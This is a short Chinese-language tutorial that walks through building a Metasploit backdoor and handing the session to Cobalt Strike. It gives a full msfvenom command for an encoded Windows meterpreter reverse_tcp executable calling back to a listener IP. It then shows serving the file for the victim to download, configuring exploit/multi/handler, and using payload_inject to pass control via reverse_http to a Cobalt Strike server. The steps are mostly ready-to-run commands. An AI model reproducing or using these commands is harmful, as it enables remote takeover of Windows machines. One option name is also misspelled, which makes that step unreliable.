目录

(一)环境准备

1、启动服务端

2、启动客户端

3、一个在msf拿到权限的靶机

(二) 配置msf创建监听

1、使用msf创建后门

2、使用python创建一个web服务,然后使用靶机下载

3、配置监控并获得meterpreter

3.1、 启动msf

3.2 、 创建监控

3.3、加载payload

3.4、配置监控参数

3.5、后台当前session

(三) 使用CS进行监控

1、加载msf的payload注入功能

2、设置payload的反弹方式

3、查看参数

4、设置cs监听端口

5、设置控制会话

6、设置当前msf不接受监听数据

7、执行

8、进入CS监控器


(一)环境准备


1、启动服务端

kali操作系统

2、启动客户端

3、一个在msf拿到权限的靶机

我这里是在虚拟机里面的windows10已经下载好msf的靶机。

(二) 配置msf创建监听


1、使用msf创建后门

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4567 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 5 -f exe -o payload.exe

2、使用python创建一个web服务,然后使用靶机下载

python -m http.server

使用靶机下载恶意代码:

3、配置监控并获得meterpreter

3.1、 启动msf

msfconsole

3.2 、 创建监控

use exploit/multi/handler

3.3、加载payload

set payload windows/meterpreter/reverse_tcp

3.4、配置监控参数

show options

set lhost 监控IP

set lport 监控端口

run 执行

在靶机执行后门程序中等待返回 meterpreter

3.5、后台当前session

background

或者在命令行里面直接输入sessions,显示当前存在的session:

(三) 使用CS进行监控


1、加载msf的payload注入功能

use exploit/windows/local/payload_inject

2、设置payload的反弹方式

set payload windows/meterpreter/reverse_http

3、查看参数

show options(图一)

set lhost 192.168.0.2(设置cs服务器的地址,图二)

图一

图二

4、设置cs监听端口

set lport 4567

5、设置控制会话

set session 1(看情况而定)

6、设置当前msf不接受监听数据

set disablepayloadhander true

7、执行

run

8、进入CS监控器

接下来就可以用cs进行实际操作!!!